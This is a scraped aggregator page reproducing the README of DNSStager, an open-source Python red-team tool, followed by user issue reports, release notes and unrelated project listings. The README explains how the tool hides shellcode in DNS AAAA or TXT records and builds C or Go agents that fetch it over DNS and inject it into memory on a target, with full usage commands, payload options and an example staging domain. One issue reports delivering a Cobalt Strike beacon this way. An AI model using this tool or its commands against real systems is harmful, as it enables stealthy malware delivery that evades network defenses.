DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.

Related tags

NetworkingDNSStager
Overview

What is DNSStager?

DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.

DNSStager will create a malicious DNS server that handles DNS requests to your domain and return your payload as a response to specific record requests such as AAAA or TXT records after splitting it into chunks and encoding the payload using different algorithms.

DNSStager can generate a custom agent written in C or GoLang that will resolve a sequence of domains, retrieve the payload, decode it and finally inject it into the memory based on any technique you want.

You can edit the code of DNSStager agent as you wish, and build it using your own custom execution techniques.

The main goal of using DNSStager is to help red teamers/pentesters to deliver their payloads in stealthy channel using DNS.

How does it work?

Based on your DNS resolution option, DNSStager will split your payload into chunks and save each chunk of the payload as a response for a subdomain.

For example, if you choose IPV6 as your option to retrieve the payload, the DNS response will be something like:

cloud-srv-1.test.mydnsserver.live. 300 IN AAAA 5648:31d2:6548:8b52:6048:8b52:1848:8b52

Where 5648:31d2:6548:8b52:6048:8b52:1848:8b52 is a part of your payload.

So, the agent will resolve some domains to retrieve the payload and then decode it and finally inject it into memory.

Currently, DNSStager only supports two records, AAAA and TXT. You can encode your payload using XOR for the AAAA record and by default it will be encoded as base64 if you choose TXT record.

DNSStager key features:

DNSStager has some key features such as:

  • Hide and Resolve your payload in IPV6 records.
  • Hide and Resolve your payload in TXT records.
  • XOR encoder to encode your payload.
  • Base64 encoder to encode your payload (only for TXT records).
  • Pure agent written in C with the ability to customise it.
  • Pure agent written in GoLang with the ability to customise it.
  • The ability to use sleep between each DNS request.
  • AND MUCH MORE TO COME!

Requirements

You can install DNSStager python requirements via:

pip3 install -r requirements.txt

You need to install GoLang version 1.16.3 and to make sure to install the following GoLang packages:

  • golang.org/x/sys
  • github.com/miekg/dns

Also, make sure to install ming-w64 via:

apt install mingw-w64

The script setup.sh should do that for you, but double check the requirements before you use it!

Installation

To get the latest version of DNSStager, make sure to clone it from this repo using the following command:

git clone https://github.com/mhaskar/DNSStager

Then you need to install the requirements using the following command:

pip3 install -r requirements.txt

And make sure to install all the previously mentioned requirements too.

After doing all that, you are ready to execute DNSStager as root to get the following:

┌─[[email protected]]─[/opt/redteaming/DNSStager]
└──╼ $sudo ./dnsstager.py



██████╗░███╗░░██╗░██████╗░██████╗████████╗░█████╗░░██████╗░███████╗██████╗░
██╔══██╗████╗░██║██╔════╝██╔════╝╚══██╔══╝██╔══██╗██╔════╝░██╔════╝██╔══██╗
██║░░██║██╔██╗██║╚█████╗░╚█████╗░░░░██║░░░███████║██║░░██╗░█████╗░░██████╔╝
██║░░██║██║╚████║░╚═══██╗░╚═══██╗░░░██║░░░██╔══██║██║░░╚██╗██╔══╝░░██╔══██╗
██████╔╝██║░╚███║██████╔╝██████╔╝░░░██║░░░██║░░██║╚██████╔╝███████╗██║░░██║
╚═════╝░╚═╝░░╚══╝╚═════╝░╚═════╝░░░░╚═╝░░░╚═╝░░╚═╝░╚═════╝░╚══════╝╚═╝░░╚═╝    

    Beta Version                           Hide your payload in DNS

[-] Please specify a domain name using --domain

Usage

To start using DNSStager, make sure to setup your DNS settings first, you need to make your domain points to the DNSStager instance as NS record in order to handle all the DNS requests to your domain.

You can read this full article about how to setup and use DNSStager.

And you can check the options using -h switch like the following:

┌─[[email protected]]─[/opt/redteaming/DNSStager]
└──╼ $sudo ./dnsstager.py -h
usage: dnsstager.py [-h] [--domain DOMAIN] [--payloads] [--prefix PREFIX]
                    [--payload PAYLOAD] [--output OUTPUT]
                    [--shellcode_path SHELLCODE_PATH] [--xorkey XORKEY]
                    [--sleep SLEEP]

DNSStager main parser

optional arguments:
  -h, --help            show this help message and exit
  --domain DOMAIN       The domain you want to use as staging host
  --payloads            show all payloads
  --prefix PREFIX       Prefix to use as part of your subdomain schema
  --payload PAYLOAD     Payload to use, see --payloads for more details
  --output OUTPUT       Agent output path
  --shellcode_path SHELLCODE_PATH
                        Shellcode file path
  --xorkey XORKEY       XOR key to encode your payload with
  --sleep SLEEP         sleep for N seconds between each DNS request

  • --domain: you can use this option to select the main domain you will use to handle the DNS requests for.

  • -- prefix: The prefix you want to use for the subdomain schema For example, if your main domain is fakedns.live you can specify the prefix as "cdn" for example, So the generate domains will be a a pattern as the following:

    • cdn0.fakedns.live
    • cdn1.fakedns.live
    • cdnN.fakedns.live

Where N is auto generated number represent the number of chunks of your payload.

  • --payload: the DNSStager payload "agent" you want to generate based on the technique, programming language and architecture.

  • --output: Output path to save DNSStager executable payload "agent".

  • --shellcode_path: Your raw/bin shellcode path.

  • --xorkey: XOR key to encode the payload with.

  • --sleep: Used to sleep for N seconds between each DNS request.

DNSStager Payloads

To check the available DNSStager payloads, you can use ./dnsstager.py --payloads to get the following results:

┌─[[email protected]]─[/opt/redteaming/DNSStager]
└──╼ $sudo ./dnsstager.py --payloads

[+] 6 DNSStager payloads Available

x64/c/ipv6			Resolve your payload as IPV6 addresses xored with custom key via compiled x64 C code
x86/c/ipv6			Resolve your payload as IPV6 addresses xored with custom key via compiled x86 C code
x64/golang/txt			Resolve your payload as TXT records encoded using base64 compiled x64 GoLang code
x64/golang/ipv6			Resolve your payload as IPV6 addresses encoded with custom key using byte add encoding via compiled x64 GoLang code
x86/golang/txt			Resolve your payload as TXT records encoded using base64 compiled x86 GoLang code
x86/golang/ipv6			Resolve your payload as IPV6 addresses encoded with custom key using byte add encoding via compiled x86 GoLang code

Example of using DNSStager with IPV6

This example will start DNSStager to resolve your payload as IPV6 using the domain test.mydnsserver.live with prefix cloud-srv- to generate compiled x64 C agent encoded with 0x10 as key:

sudo ./dnsstager.py --domain test.mydnsserver.live --payload x64/c/ipv6 --output /tmp/a2.exe --prefix cloud-srv- --shellcode_path ~/payload.bin --sleep 1 --xorkey 0x10

And the output will be:

Alt text

And to check if everything is working well, lets send DNS query to cloud-srv-0.test.mydnsserver.live to get the following:

Alt text

We can see that we received f642:89ee:fae2:c20a:a0a:4b5b:4b5a:585b as response which is the first 16 bytes of our encoded payload.

Then you can execute the agent /tmp/a2.exe (as set in using --output in the comand line) on the target machine and that will download all of the chunks required, decode them and inject them into memory for you.

License

This project is licensed under the GPL-3.0 License - see the LICENSE file for details

Comments
  • `not working:`

    `not working:`

    so i followed the steps in here : https://shells.systems/unveiling-dnsstager-a-tool-to-hide-your-payload-in-dns/ and i generated a https x64 beacon using cobalt strike (.bin file)


    then i executed dnsstager as following:

    111111

    [u can notice the 58 dns request method thing that is not found in the link above although i did the same thing]


    then i tested it :

    22222222222


    i executed the agent file :

    33333333333333

    However it stayed the same like that, i left it for like 15-20 min just waiting, however nothing happened and no session was created on my cobalt listener


    thanks for your time and code ! hope u reply soon

    opened by ORCA666 5
  • Update client-ipv6-generic.go

    Update client-ipv6-generic.go

    Fix go payload broken when executed. Adding dot-sign (.) before domain.

    Example

    Original template will be like this. cloud-srv-0test.mydnsserver.live

    Fixed template shoud be like this. cloud-srv-0.test.mydnsserver.live

    opened by AmazingFriedChickken 1
  • Agent not generating using relative paths on --output

    Agent not generating using relative paths on --output

    Hi, I noticed that if on --output argument a relative path is used (for example ./agent.exe) , the agent is not generated. It works only using absolute paths. Maybe could be an improvement to make it work anyway (I spent some minutes until realize of what is happening).

    opened by OscarAkaElvis 0
  • panic: runtime error: index out of range [0] with length 0 [winserver 2019]

    panic: runtime error: index out of range [0] with length 0 [winserver 2019]

    panic: runtime error: index out of range [0] with length 0

    goroutine 1 [running]: main.runShellcode(0x0, 0x0) /root/DNSStager/tmp/golangtemptemplate.go:61 +0x5bf main.main() /root/DNSStager/tmp/golangtemptemplate.go:135 +0x2e

    opened by Phuong39 0
  • Large files fail to complete

    Large files fail to complete

    Create a DNSStager with ~3000 records using IPV6, but when run the downloader gets to around 500 records and then stops working. Tried with Golang client and TXT records and gets to around 300 before running out of memory.

    bug good first issue 
    opened by blockanz 1
Releases(v1.0)
  • v1.0(Feb 1, 2022)

    New features added such as:

    • The ability to generate DNSStager DLL agents.
    • C agent with enhanced OPSEC and performance.
    • Print the total number of DNS requests.

    Fixed the following issues:

    • Dynamic shellcode size allocation instead of hardcoded value.
    • Remove unused variables inside the agent C code.

    Also, general code enhancements were made.

    Source code(tar.gz)
    Source code(zip)
Owner
Askar
I write codes that break codes, Hacker wannabe.
Askar
Dokumentasi belajar Network automation

Repositori belajar network automation dengan Docker, Python & GNS3 Using Frameworks and integrate with: Paramiko Netmiko Telnetlib CSV SFTP Netmiko, S

Daniel.Pepuho 3 Mar 15, 2022
This tool will scans your wi-fi/wlan and show you the connected clients

This tool will scans your wi-fi/wlan and show you the connected clients

VENKAT SAI SAGAR 3 Mar 24, 2022
Repo for investigation of timeouts that happens with prolonged training on clients

Flower-timeout Repo for investigation of timeouts that happens with prolonged training on clients. This repository is meant purely for demonstration o

1 Jan 21, 2022
List of ngrok alternatives and other ngrok-like tunneling software and services. Focus on self-hosting.

List of ngrok alternatives and other ngrok-like tunneling software and services. Focus on self-hosting.

Anders Pitman 7.3k Jan 03, 2023
Raspberry Pi Based Serial Console Server, with PushBullet Notification of IP changes, Automatic VPN termination, custom menu, Power Outlet Control, and a lot more

ConsolePi Acts as a serial Console Server, allowing you to remotely connect to ConsolePi via Telnet/SSH/bluetooth to gain Console Access to devices co

120 Jan 05, 2023
Socialhome is best described as a federated personal profile with social networking functionality

Description Socialhome is best described as a federated personal profile with social networking functionality. Users can create rich content using Mar

Jason Robinson 332 Dec 30, 2022
A Python3 discord trojan, utilizing discord webhooks for sending information.

Vape-Lite-RAT A Python3 discord trojan, utilizing discord webhooks for sending information. What you do with this code / project / idea is non of my b

NightTab 12 Oct 15, 2022
track IP Address

ipX Table of Contents ipX Welcome Features Uses Author 📝 License Welcome find the location of an IP address. Specifically, you can get the following

Ali Shahid 15 Sep 26, 2022
Ping Verification Python Script

Python Script Port Scanner Script WHAT IS IT? Port scanner script using Python. HOW IT WORKS Once the script has been executed, it will request the ta

AC 0 Dec 12, 2021
Bittensor - an open, decentralized, peer-to-peer network that functions as a market system for the development of artificial intelligence

At Bittensor, we are creating an open, decentralized, peer-to-peer network that functions as a market system for the development of artificial intelligence.

Opentensor 169 Dec 30, 2022
A simple GitHub Action that physically puts your senses on alert when your build/release fails

GH Release Paniker A simple GitHub Action that physically puts your senses on alert when your build/release fails Usage Requirements: Raspberry Pi, LE

Hemanth Krishna 5 Dec 20, 2021
NSX-T infrastructure as code - SDDC deployment

Deploy NSX-T Infrastructure - Simple Topology by Nicolas MICHEL @vpackets / LinkedIn Introduction The purpose of this entire repository is to automate

21 Nov 28, 2022
A simple tool to get information about IP

IP Info Tool Just a simple tool to get IP's information, it uses requests module to gather information about IP, if you dont have much knowledge about

0 Dec 01, 2021
A benchmark for stateful fuzzing of network protocols

A benchmark for stateful fuzzing of network protocols

3 Apr 25, 2022
AdaFruit Funhouse publishing Temperature, Humidity and Pressure to MQTT / Apache Pulsar

pulsar-adafruit-funhouse AdaFruit Funhouse publishing Temperature, Humidity and Pressure to MQTT / Apache Pulsar Device Get your own from adafruit Ada

Timothy Spann 1 Dec 30, 2021
ARTEMIS: Real-Time Detection and Automatic Mitigation for BGP Prefix Hijacking.

ARTEMIS: Real-Time Detection and Automatic Mitigation for BGP Prefix Hijacking. This is the main ARTEMIS repository that composes artemis-frontend, artemis-backend, artemis-monitor and other needed c

INSPIRE Group @FORTH-ICS 273 Jan 01, 2023
Take a list of domains and probe for working HTTP and HTTPS servers

httprobe Take a list of domains and probe for working http and https servers. Install ▶ go get -u github.com/tomnomnom/httprobe Basic Usage httprobe

Tom Hudson 2.3k Dec 28, 2022
It's an extra broadcast driver for masonite. It adds support for socketio.

It's an extra broadcast driver for masonite. It adds support for socketio.

Yubaraj Shrestha 6 Feb 23, 2022
Simplest dashboard for WireGuard VPN written in Python w/ Flask

Hi! I'm planning the next major update for this project, please let me know if you have any suggestions or feature requests ;) You can create an issue

Donald Zou 763 Jan 02, 2023
Ultimate transformation library that supports validation, contexts and aiohttp.

Trafaret Ultimate transformation library that supports validation, contexts and aiohttp. Trafaret is rigid and powerful lib to work with foreign data,

Mikhail Krivushin 174 Nov 27, 2022